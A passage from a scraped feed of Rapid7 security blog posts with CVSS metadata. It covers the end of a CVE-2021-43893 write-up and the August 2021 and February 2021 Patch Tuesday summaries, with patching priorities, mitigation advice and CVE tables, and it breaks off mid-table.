\n * If possible, audit %PATH% of critical systems to ensure no world-writable path exists.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2021-43893 with [authenticated vulnerability checks](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-43893/>) available in the December 15, 2021 content release.\n\nMetasploit Framework users can test their exposure to forced authentication attacks with a new [PetitPotam](<https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/dcerpc/petitpotam.rb>) module available in the 6.1.29 release.\n\n_**Additional reading:**_\n\n * _[PetitPotam: Novel Attack Chain Can Fully Compromise Windows Domains Running AD CS](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)_\n * _[Driver-Based Attacks: Past and Present](<https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/>)_\n * _[Open-Source Security: Getting to the Root of the Problem](<https://www.rapid7.com/blog/post/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/>)_\n * _[Ongoing Exploitation of Windows Installer CVE-2021-41379](<https://www.rapid7.com/blog/post/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-14T15:30:52", "type": "rapid7blog", "title": "Dropping Files on a Domain Controller Using CVE-2021-43893", 
"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43217", "CVE-2021-43893", "CVE-2021-44228"], "modified": "2022-02-14T15:30:52", "id": "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "href": "https://blog.rapid7.com/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-21T10:49:33", "description": "\n\nHot off the press, it\u2019s another issue of the Patch Tuesday blog! While the number of vulnerabilities is low this month, there are a number of high risk items administrators will want to patch right away including a few that will require additional remediation steps. This Patch Tuesday also includes updates for three vulnerabilities that were publicly disclosed earlier this month. Let\u2019s jump in.\n\n## Windows Elevation of Privilege Vulnerability aka HiveNightmare/SeriousSAM\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934> \nWith a public proof-of-concept having been available for some time, administrators should prioritize taking action on CVE-2021-36934. Remediation for this vulnerability requires volume shadow copies for system files to be deleted. This is due to the nature of the vulnerability, as the files with the vulnerable permissions could be restored from a backup and accessed even after the patch is installed. 
Microsoft indicates they took caution not to delete users' backups, but the trade-off is that customers will need to do the chore themselves. We've updated [our blog post](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>) with this additional information.\n\n## Windows LSA Spoofing Vulnerability aka ADV210003\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942> \nAnother high priority action for patching teams is CVE-2021-36942. This update patches one of the vectors used in the PetitPotam attack. After applying this update there are additional configurations required in order to protect systems from other attack vectors using registry keys. The InsightVM team has included detection for the registry keys needed to enable EPA and SMB Signing in addition to the normal update. Please see [our blog post](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>) for more information.\n\n## Windows Services for NFS ONCRPC XDR Driver Remote Code Execution Vulnerability\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26432> \nWhile Microsoft has not offered up any details for this vulnerability we can glean some info from the CVSS information. This remote code execution vulnerability is reachable from the network service with no authentication or user action required. There may not be an exploit available for this yet, but Microsoft indicates that \u201cExploitation [is] more likely\u201d. Put this update near the top of your TODO list.\n\n## Windows TCP/IP Remote Code Execution Vulnerability\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26424> \nLast on our list is a vulnerability that can result in remote execution on a Hyper-V host via the IPv6 networking stack. If Hyper-V is used in your environment this should be first on your list this month. 
\n\n## Summary Graphs\n\n\n\n## Summary Tables\n\n## Azure Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36949](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36949>) | Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability | No | No | 7.1 | Yes \n[CVE-2021-26428](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26428>) | Azure Sphere Information Disclosure Vulnerability | No | No | 4.4 | Yes \n[CVE-2021-26429](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26429>) | Azure Sphere Elevation of Privilege Vulnerability | No | No | 7.7 | Yes \n[CVE-2021-26430](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26430>) | Azure Sphere Denial of Service Vulnerability | No | No | 6 | Yes \n[CVE-2021-33762](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33762>) | Azure CycleCloud Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36943](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36943>) | Azure CycleCloud Elevation of Privilege Vulnerability | No | No | 4 | No \n \n## Browser Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-30597](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30597>) | Chromium: CVE-2021-30597 Use after free in Browser UI | No | No | | Yes \n[CVE-2021-30596](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30596>) | Chromium: CVE-2021-30596 Incorrect security UI in Navigation | No | No | | Yes \n[CVE-2021-30594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30594>) | Chromium: CVE-2021-30594 Use after free in Page Info UI | No | No | | Yes 
\n[CVE-2021-30593](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30593>) | Chromium: CVE-2021-30593 Out of bounds read in Tab Strip | No | No | | Yes \n[CVE-2021-30592](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30592>) | Chromium: CVE-2021-30592 Out of bounds write in Tab Groups | No | No | | Yes \n[CVE-2021-30591](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30591>) | Chromium: CVE-2021-30591 Use after free in File System API | No | No | | Yes \n[CVE-2021-30590](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30590>) | Chromium: CVE-2021-30590 Heap buffer overflow in Bookmarks | No | No | | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34532](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34532>) | ASP.NET Core and Visual Studio Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34485>) | .NET Core and Visual Studio Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-26423](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26423>) | .NET Core and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36946>) | Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | No | No | 5.4 | No \n[CVE-2021-34524](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34524>) | Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability | No | No | 8.1 | No 
\n[CVE-2021-36950](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36950>) | Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | No | No | 5.4 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36941](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36941>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-36940](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36940>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-34478](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34478>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34471>) | Microsoft Windows Defender Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26426](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26426>) | Windows User Account Profile Picture Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36948](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36948>) | Windows Update Medic Service Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-26432](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26432>) | Windows Services for NFS ONCRPC XDR Driver Remote Code Execution Vulnerability | No | No | 9.8 | No \n[CVE-2021-26433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26433>) | Windows Services 
for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36926](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36926>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36932>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36933](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36933>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26431](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26431>) | Windows Recovery Environment Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34534](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34534>) | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-34530](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34530>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34486](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34486>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34487](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34487>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36938>) | Windows Cryptographic Primitives Library Information Disclosure Vulnerability | No | No | 5.5 | No \n[CVE-2021-36945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36945>) | Windows 10 Update Assistant 
Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-34536](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34536>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34484>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26424](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26424>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-36936](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36936>) | Windows Print Spooler Remote Code Execution Vulnerability | No | Yes | 8.8 | No \n[CVE-2021-36947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36947>) | Windows Print Spooler Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-34483](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34483>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36937](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36937>) | Windows Media MPEG-4 Video Decoder Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-36942](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36942>) | Windows LSA Spoofing Vulnerability | No | Yes | 7.5 | Yes \n[CVE-2021-34533](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34533>) | Windows Graphics Component Font Parsing Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-26425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26425>) | Windows Event Tracing Elevation of 
Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36927>) | Windows Digital TV Tuner device registration application Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34537](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34537>) | Windows Bluetooth Driver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34480](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34480>) | Scripting Engine Memory Corruption Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-34535](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34535>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes", "cvss3": {}, "published": "2021-08-11T03:19:33", "type": "rapid7blog", "title": "Patch Tuesday - August 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26423", "CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26428", "CVE-2021-26429", "CVE-2021-26430", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-30590", "CVE-2021-30591", "CVE-2021-30592", "CVE-2021-30593", "CVE-2021-30594", "CVE-2021-30596", "CVE-2021-30597", "CVE-2021-33762", "CVE-2021-34471", "CVE-2021-34478", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34485", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34524", "CVE-2021-34530", "CVE-2021-34532", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36934", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36940", "CVE-2021-36941", "CVE-2021-36942", "CVE-2021-36943", "CVE-2021-36945", "CVE-2021-36946", "CVE-2021-36947", "CVE-2021-36948", "CVE-2021-36949", "CVE-2021-36950"], "modified": "2021-08-11T03:19:33", "id": 
"RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD", "href": "https://blog.rapid7.com/2021/08/11/patch-tuesday-august-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-10T00:48:57", "description": "\n\nThe second Patch Tuesday of 2021 is relatively light on the vulnerability count, with 64 CVEs being addressed across the majority of Microsoft\u2019s product families. Despite that, there\u2019s still plenty to discuss this month.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 28 \nESU | 14 \nMicrosoft Office | 11 \nBrowser | 9 \nDeveloper Tools | 8 \nMicrosoft Dynamics | 2 \nExchange Server | 2 \nAzure | 2 \nSystem Center | 2 \n \n### Exploited and Publicly Disclosed Vulnerabilities\n\nOne zero-day was announced: [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>) is a privilege elevation vulnerability affecting the Win32k component of Windows 10 and Windows Server 2019, reported to be exploited in the wild. 
Four vulnerabilities have been previously disclosed: [CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>), a privilege elevation vulnerability in Windows Installer, affecting all supported versions of Windows; [CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>), which is a denial of service (DoS) affecting Windows 10 and Server 2019; [CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>), an information disclosure vulnerability affecting DirectX in Windows 10 and Server 2019; and [CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>), an RCE in .NET Core.\n\n### Vulnerabilities in Windows TCP/IP\n\nMicrosoft also disclosed a set of [three serious vulnerabilities](<https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/>) affecting the TCP/IP networking stack in all supported versions of Windows. Two of these ([CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) and [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>)) carry a base CVSSv3 score of 9.8 and could allow Remote Code Execution (RCE). [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) is specific to IPv6 link-local addresses, meaning it isn\u2019t exploitable over the public internet. [CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>), however, does not have this limitation. The third, [CVE-2021-24086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24086>), is a DoS vulnerability that could allow an attacker to trigger a \u201cblue screen of death\u201d on any Windows system that is directly exposed to the internet, using only a small amount of network traffic. 
The RCE exploits are probably not a threat in the short term, due to the complexity of the vulnerabilities, but DoS attacks are expected to be seen much more quickly. Windows systems should be patched as soon as possible to protect against these.\n\nIn the event a patch cannot be applied immediately, such as on systems that cannot be rebooted, Microsoft has published mitigation guidance that will protect against exploitation of the TCP/IP vulnerabilities. Depending on the exposure of an asset, IPv4 Source Routing should be disabled via a Group Policy or a Netsh command, and IPv6 packet reassembly should be disabled via a separate Netsh command. IPv4 Source Routing requests and IPv6 fragments can also be blocked by load balancers, firewalls, or other edge devices to mitigate these issues.\n\n### Zerologon Update\n\nBack in August 2020, Microsoft addressed a critical remote code vulnerability (CVE-2020-1472) affecting the Netlogon protocol (MS-NRPC), a.k.a. \u201c[Zerologon](<https://blog.rapid7.com/2020/09/14/cve-2020-1472-zerologon-critical-privilege-escalation/>)\u201d. In October, Microsoft [noted](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) that attacks which exploit this weakness have been seen in the wild. On January 14, 2021, they [reminded](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>) organizations that the February 2021 security update bundle will also be enabling \u201cDomain Controller enforcement mode\u201d by default to fully address this weakness. Any system that tries to make an insecure Netlogon connection will be denied access. Any business-critical process that relies on these insecure connections will cease to function. 
Rapid7 encourages all organizations to [heed the detailed guidance](<https://support.microsoft.com/en-us/topic/how-to-manage-the-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-f7e8cc17-0309-1d6a-304e-5ba73cd1a11e#bkmk_detectingnon_compliant>) before applying the latest updates to ensure business process continuity.\n\n### Adobe\n\nMost important amongst the [six security advisories](<https://helpx.adobe.com/security.html>) published by Adobe today is [APSB21-09](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>), detailing 23 CVEs affecting Adobe Acrobat and Reader. Six of these are rated Critical and allow Arbitrary Code Execution, one of which (CVE-2021-21017) has been seen exploited in the wild in attacks targeting Adobe Reader users on Windows.\n\n### Summary Tables\n\n#### Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24109](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24109>) | Microsoft Azure Kubernetes Service Elevation of Privilege Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-24087](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24087>) | Azure IoT CLI extension Elevation of Privilege Vulnerability | No | No | 7 | Yes \n \n#### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-24100](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24100>) | Microsoft Edge for Android Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-24113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24113>) | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-21148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21148>) | Chromium CVE-2021-21148: Heap buffer overflow in V8 | N/A | N/A | nan | Yes \n[CVE-2021-21147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21147>) | Chromium CVE-2021-21147: Inappropriate implementation in Skia | N/A | N/A | nan | Yes \n[CVE-2021-21146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21146>) | Chromium CVE-2021-21146: Use after free in Navigation | N/A | N/A | nan | Yes \n[CVE-2021-21145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21145>) | Chromium CVE-2021-21145: Use after free in Fonts | N/A | N/A | nan | Yes \n[CVE-2021-21144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21144>) | Chromium CVE-2021-21144: Heap buffer overflow in Tab Groups | N/A | N/A | nan | Yes \n[CVE-2021-21143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21143>) | Chromium CVE-2021-21143: Heap buffer overflow in Extensions | N/A | N/A | nan | Yes \n[CVE-2021-21142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21142>) | Chromium CVE-2021-21142: Use after free in Payments | N/A | N/A | nan | Yes \n \n#### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-26700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26700>) | Visual Studio Code npm-script Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1639](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1639>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7 | No \n[CVE-2021-1733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1733>) | Sysinternals PsExec Elevation of Privilege Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2021-24105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24105>) | Package Managers Configurations Remote Code Execution Vulnerability | No | No | 8.4 | Yes \n[CVE-2021-24111](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24111>) | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-1721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1721>) | .NET Core and Visual Studio Denial of Service Vulnerability | No | Yes | 6.5 | No \n[CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>) | .NET Core Remote Code Execution Vulnerability | No | Yes | 8.1 | Yes \n[CVE-2021-24112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24112>) | .NET Core Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n \n#### ESU Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? 
---|---|---|---|---|---
[CVE-2021-24080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24080>) | Windows Trust Verification API Denial of Service Vulnerability | No | No | 6.5 | No
[CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes
[CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes
[CVE-2021-24086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24086>) | Windows TCP/IP Denial of Service Vulnerability | No | No | 7.5 | Yes
[CVE-2021-1734](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1734>) | Windows Remote Procedure Call Information Disclosure Vulnerability | No | No | 7.5 | Yes
[CVE-2021-25195](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-25195>) | Windows PKU2U Elevation of Privilege Vulnerability | No | No | 7.8 | Yes
[CVE-2021-24088](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24088>) | Windows Local Spooler Remote Code Execution Vulnerability | No | No | 8.8 | No
[CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>) | Windows Installer Elevation of Privilege Vulnerability | No | Yes | 7.8 | No
[CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 9.8 | Yes
[CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 8.1 | Yes
[CVE-2021-24102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24102>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-24103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24103>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-24078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24078>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes
[CVE-2021-24083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24083>) | Windows Address Book Remote Code Execution Vulnerability | No | No | 7.8 | No

#### Exchange Server Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
---|---|---|---|---|---
[CVE-2021-24085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24085>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 6.5 | Yes
[CVE-2021-1730](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1730>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 5.4 | Yes

#### Microsoft Dynamics Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
---|---|---|---|---|---
[CVE-2021-1724](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1724>) | Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | No | No | 6.1 | No
[CVE-2021-24101](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24101>) | Microsoft Dataverse Information Disclosure Vulnerability | No | No | 6.5 | Yes

#### Microsoft Office Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
---|---|---|---|---|---
